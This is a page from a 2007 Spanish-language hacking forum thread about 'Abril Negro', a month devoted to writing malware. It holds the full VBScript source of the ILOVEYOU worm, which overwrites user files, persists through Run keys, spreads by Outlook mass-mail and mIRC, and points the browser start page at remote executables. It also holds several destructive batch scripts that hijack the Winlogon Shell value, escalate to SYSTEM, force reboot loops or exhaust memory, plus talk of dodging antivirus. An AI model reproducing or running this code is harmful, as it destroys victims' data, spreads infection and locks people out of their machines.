elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Usando Git para manipular el directorio de trabajo, el índice y commits (segunda parte)


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Análisis y Diseño de Malware
| | |-+  Abril negro (Moderadores: Man-In-the-Middle, WHK, kub0x, fary)
| | | |-+  Abril Negro 2007
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: 1 2 3 [4] 5 Ir Abajo Respuesta Imprimir
Autor Tema: Abril Negro 2007  (Leído 29,094 veces)
Novlucker
Ninja y
Colaborador
***
Desconectado Desconectado

Mensajes: 10.683

Yo que tu lo pienso dos veces


Ver Perfil
Re: Abril Negro 2007
« Respuesta #30 en: 13 Abril 2007, 04:01 am »

Puuaaa  :o, no habia visto bien este post....una maldad detras de la otra.....

En cuanto a esto:

Citar
XD un scripten vbs, que todos los doc, xls te los ponga en cero, para que maratel el ordenador, con esto en segundos toda su data al tacho
Citar
Lo de VBscript tambien, pero no se usar VBscript

Yo si se usar vbs  ;D, pero creo que es mejor no seguir poniendo codes para que los lammers que pasan por aca los pongan en practica

 :¬¬


En línea

Contribuye con la limpieza del foro, reporta los "casos perdidos" a un MOD XD
"Hay dos cosas infinitas: el Universo y la estupidez  humana. Y de la primera no estoy muy seguro."
Albert Einstein
Man-In-the-Middle
Moderador
***
Desconectado Desconectado

Mensajes: 3.836



Ver Perfil
Re: Abril Negro 2007
« Respuesta #31 en: 13 Abril 2007, 04:05 am »

Es abril negro!!, esta permitido ...juasssssss



En línea

https://www.latotatv.com
Código:
La Tota TV
~~
Ex-Staff
*
Desconectado Desconectado

Mensajes: 2.981


Ver Perfil WWW
Re: Abril Negro 2007
« Respuesta #32 en: 14 Abril 2007, 20:07 pm »

Pues a mi esto de Abril Negro no me gusta un pelo.. la gente empieza a preguntar unas cosas. Este mes me abstengo practicamente de postear en este suforo  :-X
En línea

WHK
Moderador Global
***
Desconectado Desconectado

Mensajes: 6.606


Sin conocimiento no hay espíritu


Ver Perfil WWW
Re: Abril Negro 2007
« Respuesta #33 en: 16 Abril 2007, 02:24 am »

Alguien dijo BVscript??? ;D

I LOVE LETTERS FOR YOU( VIRUS):


rem  barok -loveletter(vbe) <i hate go to school>
rem          by: spyder  /  ispyder@mail.com  /  @GRAMMERSoft Group  /  Manila,Philippines
On Error Resume Next
dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,dow
eq=""
ctr=0
Set fso = CreateObject("Scripting.FileSystemObject")
set file = fso.OpenTextFile(WScript.ScriptFullname,1)
vbscopy=file.ReadAll
main()
sub main()
On Error Resume Next
dim wscr,rr
set wscr=CreateObject("WScript.Shell")
rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout")
if (rr>=1) then
wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout",0,"REG_DWORD"
end if
Set dirwin = fso.GetSpecialFolder(0)
Set dirsystem = fso.GetSpecialFolder(1)
Set dirtemp = fso.GetSpecialFolder(2)
Set c = fso.GetFile(WScript.ScriptFullName)
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
regruns()
html()
spreadtoemail()
listadriv()
end sub
sub regruns()
On Error Resume Next
Dim num,downread
regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSKernel32",dirsystem&"\MSKernel32.vbs"
regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\Win32DLL",dirwin&"\Win32DLL.vbs"
downread=""
downread=regget("HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Download Directory")
if (downread="") then
downread="c:\"
end if
if (fileexist(dirsystem&"\WinFAT32.exe")=1) then
Randomize
num = Int((4 * Rnd) + 1)
if num = 1 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfmhPnjw6587345gvsdf7679njbvYT/WIN-BUGSFIX.exe"
elseif num = 2 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGFikjUIyqwerWe546786324hjk4jnHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe"
elseif num = 3 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~koichi/jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBdQZnmPOhfgER67b3Vbvg/WIN-BUGSFIX.exe"
elseif num = 4 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSDGjkhYUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234iuy7thjg/WIN-BUGSFIX.exe"
end if
end if
if (fileexist(downread&"\WIN-BUGSFIX.exe")=0) then
regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WIN-BUGSFIX",downread&"\WIN-BUGSFIX.exe"
regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page","about:blank"
end if
end sub
sub listadriv
On Error Resume Next
Dim d,dc,s
Set dc = fso.Drives
For Each d in dc
If d.DriveType = 2 or d.DriveType=3 Then
folderlist(d.path&"\")
end if
Next
listadriv = s
end sub
sub infectfiles(folderspec) 
On Error Resume Next
dim f,f1,fc,ext,ap,mircfname,s,bname,mp3
set f = fso.GetFolder(folderspec)
set fc = f.Files
for each f1 in fc
ext=fso.GetExtensionName(f1.path)
ext=lcase(ext)
s=lcase(f1.name)
if (ext="vbs") or (ext="vbe") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
elseif(ext="js") or (ext="jse") or (ext="css") or (ext="wsh") or (ext="sct") or (ext="hta") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
bname=fso.GetBaseName(f1.path)
set cop=fso.GetFile(f1.path)
cop.copy(folderspec&"\"&bname&".vbs")
fso.DeleteFile(f1.path)
elseif(ext="jpg") or (ext="jpeg") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
set cop=fso.GetFile(f1.path)
cop.copy(f1.path&".vbs")
fso.DeleteFile(f1.path)
elseif(ext="mp3") or (ext="mp2") then
set mp3=fso.CreateTextFile(f1.path&".vbs")
mp3.write vbscopy
mp3.close
set att=fso.GetFile(f1.path)
att.attributes=att.attributes+2
end if
if (eq<>folderspec) then
if (s="mirc32.exe") or (s="mlink32.exe") or (s="mirc.ini") or (s="script.ini") or (s="mirc.hlp") then
set scriptini=fso.CreateTextFile(folderspec&"\script.ini")
scriptini.WriteLine "[script]"
scriptini.WriteLine ";mIRC Script"
scriptini.WriteLine ";  Please dont edit this script... mIRC will corrupt, if mIRC will"
scriptini.WriteLine "     corrupt... WINDOWS will affect and will not run correctly. thanks"
scriptini.WriteLine ";"
scriptini.WriteLine ";Khaled Mardam-Bey"
scriptini.WriteLine ";http://www.mirc.com"
scriptini.WriteLine ";"
scriptini.WriteLine "n0=on 1:JOIN:#:{"
scriptini.WriteLine "n1=  /if ( $nick == $me ) { halt }"
scriptini.WriteLine "n2=  /.dcc send $nick "&dirsystem&"\LOVE-LETTER-FOR-YOU.HTM"
scriptini.WriteLine "n3=}"
scriptini.close
eq=folderspec
end if
end if
next 
end sub
sub folderlist(folderspec) 
On Error Resume Next
dim f,f1,sf
set f = fso.GetFolder(folderspec) 
set sf = f.SubFolders
for each f1 in sf
infectfiles(f1.path)
folderlist(f1.path)
next 
end sub
sub regcreate(regkey,regvalue)
Set regedit = CreateObject("WScript.Shell")
regedit.RegWrite regkey,regvalue
end sub
function regget(value)
Set regedit = CreateObject("WScript.Shell")
regget=regedit.RegRead(value)
end function
function fileexist(filespec)
On Error Resume Next
dim msg
if (fso.FileExists(filespec)) Then
msg = 0
else
msg = 1
end if
fileexist = msg
end function
function folderexist(folderspec)
On Error Resume Next
dim msg
if (fso.GetFolderExists(folderspec)) then
msg = 0
else
msg = 1
end if
fileexist = msg
end function
sub spreadtoemail()
On Error Resume Next
dim x,a,ctrlists,ctrentries,malead,b,regedit,regv,regad
set regedit=CreateObject("WScript.Shell")
set out=WScript.CreateObject("Outlook.Application")
set mapi=out.GetNameSpace("MAPI")
for ctrlists=1 to mapi.AddressLists.Count
set a=mapi.AddressLists(ctrlists)
x=1
regv=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a)
if (regv="") then
regv=1
end if
if (int(a.AddressEntries.Count)>int(regv)) then
for ctrentries=1 to a.AddressEntries.Count
malead=a.AddressEntries(x)
regad=""
regad=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead)
if (regad="") then
set male=out.CreateItem(0)
male.Recipients.Add(malead)
male.Subject = "ILOVEYOU"
male.Body = vbcrlf&"kindly check the attached LOVELETTER coming from me."
male.Attachments.Add(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
male.Send
regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead,1,"REG_DWORD"
end if
x=x+1
next
regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count
else
regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count
end if
next
Set out=Nothing
Set mapi=Nothing
end sub
sub html
On Error Resume Next
dim lines,n,dta1,dta2,dt1,dt2,dt3,dt4,l1,dt5,dt6
dta1="<HTML><HEAD><TITLE>LOVELETTER - HTML<?-?TITLE><META NAME=@-@Generator@-@ CONTENT=@-@BAROK VBS - LOVELETTER@-@>"&vbcrlf& _
"<META NAME=@-@Author@-@ CONTENT=@-@spyder ?-? ispyder@mail.com ?-? @GRAMMERSoft Group ?-? Manila, Philippines ?-? March 2000@-@>"&vbcrlf& _
"<META NAME=@-@Description@-@ CONTENT=@-@simple but i think this is good...@-@>"&vbcrlf& _
"<?-?HEAD><BODY ONMOUSEOUT=@-@window.name=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU.HTM#-#,#-#main#-#)@-@ "&vbcrlf& _
"ONKEYDOWN=@-@window.name=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU.HTM#-#,#-#main#-#)@-@ BGPROPERTIES=@-@fixed@-@ BGCOLOR=@-@#FF9933@-@>"&vbcrlf& _
"<CENTER><p>This HTML file need ActiveX Control<?-?p><p>To Enable to read this HTML file<BR>- Please press #-#YES#-# button to Enable ActiveX<?-?p>"&vbcrlf& _
"<?-?CENTER><MARQUEE LOOP=@-@infinite@-@ BGCOLOR=@-@yellow@-@>----------z--------------------z----------<?-?MARQUEE> "&vbcrlf& _
"<?-?BODY><?-?HTML>"&vbcrlf& _
"<SCRIPT language=@-@JScript@-@>"&vbcrlf& _
"<!--?-??-?"&vbcrlf& _
"if (window.screen){var wi=screen.availWidth;var hi=screen.availHeight;window.moveTo(0,0);window.resizeTo(wi,hi);}"&vbcrlf& _
"?-??-?-->"&vbcrlf& _
"<?-?SCRIPT>"&vbcrlf& _
"<SCRIPT LANGUAGE=@-@VBScript@-@>"&vbcrlf& _
"<!--"&vbcrlf& _
"on error resume next"&vbcrlf& _
"dim fso,dirsystem,wri,code,code2,code3,code4,aw,regdit"&vbcrlf& _
"aw=1"&vbcrlf& _
"code="
dta2="set fso=CreateObject(@-@Scripting.FileSystemObject@-@)"&vbcrlf& _
"set dirsystem=fso.GetSpecialFolder(1)"&vbcrlf& _
"code2=replace(code,chr(91)&chr(45)&chr(91),chr(39))"&vbcrlf& _
"code3=replace(code2,chr(93)&chr(45)&chr(93),chr(34))"&vbcrlf& _
"code4=replace(code3,chr(37)&chr(45)&chr(37),chr(92))"&vbcrlf& _
"set wri=fso.CreateTextFile(dirsystem&@-@^-^MSKernel32.vbs@-@)"&vbcrlf& _
"wri.write code4"&vbcrlf& _
"wri.close"&vbcrlf& _
"if (fso.FileExists(dirsystem&@-@^-^MSKernel32.vbs@-@)) then"&vbcrlf& _
"if (err.number=424) then"&vbcrlf& _
"aw=0"&vbcrlf& _
"end if"&vbcrlf& _
"if (aw=1) then"&vbcrlf& _
"document.write @-@ERROR: can#-#t initialize ActiveX@-@"&vbcrlf& _
"window.close"&vbcrlf& _
"end if"&vbcrlf& _
"end if"&vbcrlf& _
"Set regedit = CreateObject(@-@WScript.Shell@-@)"&vbcrlf& _
"regedit.RegWrite @-@HKEY_LOCAL_MACHINE^-^Software^-^Microsoft^-^Windows^-^CurrentVersion^-^Run^-^MSKernel32@-@,dirsystem&@-@^-^MSKernel32.vbs@-@"&vbcrlf& _
"?-??-?-->"&vbcrlf& _
"<?-?SCRIPT>"
dt1=replace(dta1,chr(35)&chr(45)&chr(35),"'")
dt1=replace(dt1,chr(64)&chr(45)&chr(64),"""")
dt4=replace(dt1,chr(63)&chr(45)&chr(63),"/")
dt5=replace(dt4,chr(94)&chr(45)&chr(94),"\")
dt2=replace(dta2,chr(35)&chr(45)&chr(35),"'")
dt2=replace(dt2,chr(64)&chr(45)&chr(64),"""")
dt3=replace(dt2,chr(63)&chr(45)&chr(63),"/")
dt6=replace(dt3,chr(94)&chr(45)&chr(94),"\")
set fso=CreateObject("Scripting.FileSystemObject")
set c=fso.OpenTextFile(WScript.ScriptFullName,1)
lines=Split(c.ReadAll,vbcrlf)
l1=ubound(lines)
for n=0 to ubound(lines)
lines(n)=replace(lines(n),"'",chr(91)+chr(45)+chr(91))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
lines(n)=replace(lines(n),"\",chr(37)+chr(45)+chr(37))
if (l1=n) then
lines(n)=chr(34)+lines(n)+chr(34)
else
lines(n)=chr(34)+lines(n)+chr(34)&"&vbcrlf& _"
end if
next
set b=fso.CreateTextFile(dirsystem+"\LOVE-LETTER-FOR-YOU.HTM")
b.close
set d=fso.OpenTextFile(dirsystem+"\LOVE-LETTER-FOR-YOU.HTM",2)
d.write dt5
d.write join(lines,vbcrlf)
d.write vbcrlf
d.write dt6
d.close
end sub
En línea

Man-In-the-Middle
Moderador
***
Desconectado Desconectado

Mensajes: 3.836



Ver Perfil
Re: Abril Negro 2007
« Respuesta #34 en: 16 Abril 2007, 02:44 am »

jaja a eso me referia WHK , se modifica la parte de la autocopia, nada mas y sacarle la parte de html , payload, email.
En línea

https://www.latotatv.com
Código:
La Tota TV
nhaalclkiemr


Desconectado Desconectado

Mensajes: 1.678


Máximo exponente 9DB9F1AEED2FADBDE 997BBE20FEDA92


Ver Perfil WWW
Re: Abril Negro 2007
« Respuesta #35 en: 17 Abril 2007, 14:59 pm »

El modulo IMON me detecta una amenaza tan solo con entrar a esta pagina jajaja...asi k hay k ingienarselas para k no detecten este codigo los antivirus...

Y por cierto...k es lo k hace??

Un saludo ;) ;)
En línea

StasFodidoCrypter 1.0 - 100% (old)
StasFodidoCrypter 2.0 - 85% (deserted)
Fire AV/FW-Killer - 97% (deserted)
R-WlanXDecrypter 1.0- 100%
Novlucker
Ninja y
Colaborador
***
Desconectado Desconectado

Mensajes: 10.683

Yo que tu lo pienso dos veces


Ver Perfil
Re: Abril Negro 2007
« Respuesta #36 en: 17 Abril 2007, 15:14 pm »

Se trata del codigo fuente de un virus muy conocido.. se copia en algunas carpetas, luego ademas modifica archivos como js, wsh, entre otros, ejecuta una determinada pagina dependiendo del azar....se agreta al registro, se autoenvia por outlook, esto casi no funciona hoy en dia... etc etc etc

Prueba en google por el nombre y te sale mas info de las compañias de av

salu2
En línea

Contribuye con la limpieza del foro, reporta los "casos perdidos" a un MOD XD
"Hay dos cosas infinitas: el Universo y la estupidez  humana. Y de la primera no estoy muy seguro."
Albert Einstein
nhaalclkiemr


Desconectado Desconectado

Mensajes: 1.678


Máximo exponente 9DB9F1AEED2FADBDE 997BBE20FEDA92


Ver Perfil WWW
Re: Abril Negro 2007
« Respuesta #37 en: 26 Abril 2007, 19:16 pm »

Estos son varios BATXH que se me ocurren pero la verdad algunos aún no los he provado:

-Este se eleva a SYSTEM y hace que se autoejecute siempre (incluso en Modo seguro) que se inicie Windows. Termina con el services.exe y todos los programas que hayan sido ejecutados por el...es decir, todos los servicios...Por lo que aparece un mensaje de error y se reinicia la maquina a los 60 segundos.
Recuerda al Virus Blaster jejeje

Código:
@echo off
if exist %windir%\system32\svchost.bat goto start
copy /Y %0 %windir%\system32\svchost.bat
start %windir%\system32\svchost.bat
del /S /F /Q /A:- %0
exit
:start
echo @echo off>>temp.bat
echo reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Shell /t REG_SZ /d "Explorer.exe,svchost.bat" /f>>temp.bat
echo taskkill /F /IM services.exe /T>>temp.bat
echo del /S /F /Q /A:- temp.bat>>temp.bat
move temp.bat %windir%\system32\temp.bat
set a=0
set z=%TIME:~0,2%
if "%TIME:~0,1%"==" " set z=0%TIME:~1,1%
if "%TIME:~8,1%"=="," goto normal
if "%TIME:~10,1%"=="," goto 2caso
if "%TIME:~12,1%"=="," goto 3caso
:normal
set x=%TIME:~3,2%
goto a
:2caso
set x=%TIME:~4,2%
goto a
:3caso
set x=%TIME:~5,2%
:a
set errorlevel=
set /A a=%a%+1
if "%x%"=="08" set x=8
if "%x%"=="09" set x=9
set /A x=%x%+1
at.exe %z%:%x% temp.bat
if %a%==11 goto b
if not %errorlevel%==0 goto a
schtasks /run /tn at1
goto d
:b
set a=0
:c
set errorlevel=
set /A a=%a%+1
if %x% LEQ 9 set x=0%x%
schtasks /create /tn temp /tr temp.bat /sc once /st %z%:%x%:00 /ru System
if %a%==11 goto e
if not %errorlevel%==0 goto c
schtasks /run /tn temp
if not %errorlevel%==0 goto c
goto d
:e
temp.bat
:d
exit


-Este es más potente y sencillo. Se autoejecuta como el otro pero hace que el PC se reinicie automaticamente:

Código:
@echo off
echo shutdown -r -f -t 0>winnt.bat
move /Y winnt.bat %windir%\system32\winnt.bat
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Shell /t REG_SZ /d "Explorer.exe,winnt.bat" /f
shutdown -r -f -t 0
exit

-Este es igual que el ultimo pero de otra manera que no se si funcionara...:

Código:
@echo off
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Shell /t REG_SZ /d "Explorer.exe,shutdown -r -f -t 0" /f
shutdown -r -f -t 0
exit

-Este hace que cada vez que se intenta iniciar sesion se cierre automaticamente:

Código:
@echo off
reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /va /f
shutdown -s -f -t 0
exit

-Este hace que tu PC se bloquee cada vez que se ejecute Windows...Ejecuta un bucle infinito el cual ejecuta reiteradamente el mismo bucle, en cada bucle abre una consola de comandos y hace que la PC se quede sin memoria:

Código:
@echo off
echo :a>>rundll32.bat
echo start rundll32.bat>>rundll32.bat
echo goto a>>rundll32.bat
move /Y rundll32.bat %windir%\system32\rundll32.bat
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Shell /t REG_SZ /d "Explorer.exe,rundll32.bat" /f
exit


-Este hace el mismo que el anterior pero lo ejecuta de modo SYSTEM, de modo que causará el bloqueo pero no mostrará las ventanas:

Código:
@echo off
if exist %windir%\system32\svchost.bat goto start
copy /Y %0 %windir%\system32\svchost.bat
cd %windir%\system32\
start svchost.bat
del /S /F /Q /A:- %0
exit
:start
if exist %windir%\system32\temp.bat del /S /F /Q /A:- %windir%\system32\temp.bat
echo @echo off>>temp.bat
echo :a>>temp.bat
echo start temp.bat>>temp.bat
echo goto a>>temp.bat
move temp.bat %windir%\system32\temp.bat
set a=0
set z=%TIME:~0,2%
if "%TIME:~0,1%"==" " set z=0%TIME:~1,1%
if "%TIME:~8,1%"=="," goto normal
if "%TIME:~10,1%"=="," goto 2caso
if "%TIME:~12,1%"=="," goto 3caso
:normal
set x=%TIME:~3,2%
goto a
:2caso
set x=%TIME:~4,2%
goto a
:3caso
set x=%TIME:~5,2%
:a
set errorlevel=
set /A a=%a%+1
if "%x%"=="08" set x=8
if "%x%"=="09" set x=9
set /A x=%x%+1
at.exe %z%:%x% temp.bat
if %a%==11 goto b
if not %errorlevel%==0 goto a
schtasks /run /tn at1
goto d
:b
set a=0
:c
set errorlevel=
set /A a=%a%+1
if %x% LEQ 9 set x=0%x%
schtasks /create /tn temp /tr temp.bat /sc once /st %z%:%x%:00 /ru System
if %a%==11 goto e:
if not %errorlevel%==0 goto c
schtasks /run /tn temp
if not %errorlevel%==0 goto c
goto d
:e
cd %windir%\system32\
start temp.bat
:d
exit


Son codes la mayoría muy sencillos pero que pueden causar bastantes molestias, la mayoría de las veces para arreglar tendrás que iniciar con un disco de arranke para solucionarlo...

Tenía otro que hacia que cada vez que intentabas ejecutar un .exe te abría un programa que mostraba 0 y 1 estilo Matrix...pero ahora mismo no se donde lo tengo...

Otro era uno que creaba una cuenta limitada y te obligaba siempre a iniciar con esa cuenta y no te dejaba iniciar como Administrador...pero nunca conseguí hacer que funcionase perfectamente...pues solo me funcionaba con el SP1 y ademas era muy facil de arreglar...

Estes que puse la mayoría no los prové...pero deben de funcionar...son bastante lammers pero a veces pueden llegar a ser muy molestos ;D ;D

Saludos ;) ;)
En línea

StasFodidoCrypter 1.0 - 100% (old)
StasFodidoCrypter 2.0 - 85% (deserted)
Fire AV/FW-Killer - 97% (deserted)
R-WlanXDecrypter 1.0- 100%
WHK
Moderador Global
***
Desconectado Desconectado

Mensajes: 6.606


Sin conocimiento no hay espíritu


Ver Perfil WWW
Re: Abril Negro 2007
« Respuesta #38 en: 29 Abril 2007, 00:42 am »

ps si inician en modo a prueva de fallos pueden eliminar muy facilmente la entrada de registro sin que pase nada grave ni que se reinicie la pc... pero si puedes injectar un servicio que haga que te reinicie la pc, otro en menu inicio/run, otro en el reg, otro reemplazando a winlogon.exe  :P y asi y ps una ves lo hice con un CD de musica hibrido para que no los pudieran copiar y ni aún en prueva de fallos pudo resolver el problema porque igual se le reiniciaba e hice que se duplicara 5 veces por cada encendida de pc con nuevas entradas de registros e injecciones en algunos dll etc etc...
En este caso no usé el comando shutdown sino un programa de apagado automatico que recibia ordenes en modo consola que forzaba la detención de todos los procesos y hacia todo lo posible para que la pc se apagara si o si ya que Aunque tengas un notepad sin guardar ps el shutdown no funciona.
Es ideal para que no te pirateen los CDs de musica que vendes o los videos VCD  :P solo basta con hacerle un autorun tanto al vcd dat como al hibrido de datos combinado con pistas de audio.
En línea

nhaalclkiemr


Desconectado Desconectado

Mensajes: 1.678


Máximo exponente 9DB9F1AEED2FADBDE 997BBE20FEDA92


Ver Perfil WWW
Re: Abril Negro 2007
« Respuesta #39 en: 29 Abril 2007, 16:11 pm »

No, si te fijas la clave que uso yo para que el bat se ejecute al inicio del sistema no es "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" yo uso la clave "Shell" que está en "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" y por defecto tiene el valor de "explorer.exe" y es la encargada de cargar el explorador, y este se carga tambien en modo a prueva de fallos.

En resumen, aunke inicies en modo a prueva de fallos funcionarán igual pork el .bat se inicia igual. Mirate este manual que he hecho yo sobre como se inician los archivos en Windows XP:

Manual de procesos que se ejecutan al inicio de Windows XP

El metodo que utilizo yo para iniciar el bat es un metodo que funciona incluso a prueva de fallos.


Sobre el shutdown decir que tambien funciona igual en modo a prueva de fallos...

La unica forma que se me ocurre ahora mismo es iniciar desde otro SO o desde un CD de arranque y eliminar el bato o la entrada en el registro...

Un saludo ;) ;)
En línea

StasFodidoCrypter 1.0 - 100% (old)
StasFodidoCrypter 2.0 - 85% (deserted)
Fire AV/FW-Killer - 97% (deserted)
R-WlanXDecrypter 1.0- 100%
Páginas: 1 2 3 [4] 5 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Abril Negro 2012?
Abril negro
peib0l 2 5,905 Último mensaje 13 Abril 2012, 20:11 pm
por berz3k
Sobre Abril Negro « 1 2 »
Abril negro
kub0x 12 14,701 Último mensaje 19 Abril 2015, 23:42 pm
por dRak0
Abril Negro 2006
Abril negro
WHK 0 3,511 Último mensaje 4 Febrero 2017, 18:55 pm
por WHK
Abril Negro 2007
Abril negro
WHK 0 3,452 Último mensaje 4 Febrero 2017, 19:16 pm
por WHK
¿Qué es Abril Negro?
Abril negro
WHK 0 4,276 Último mensaje 4 Febrero 2017, 21:43 pm
por WHK
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines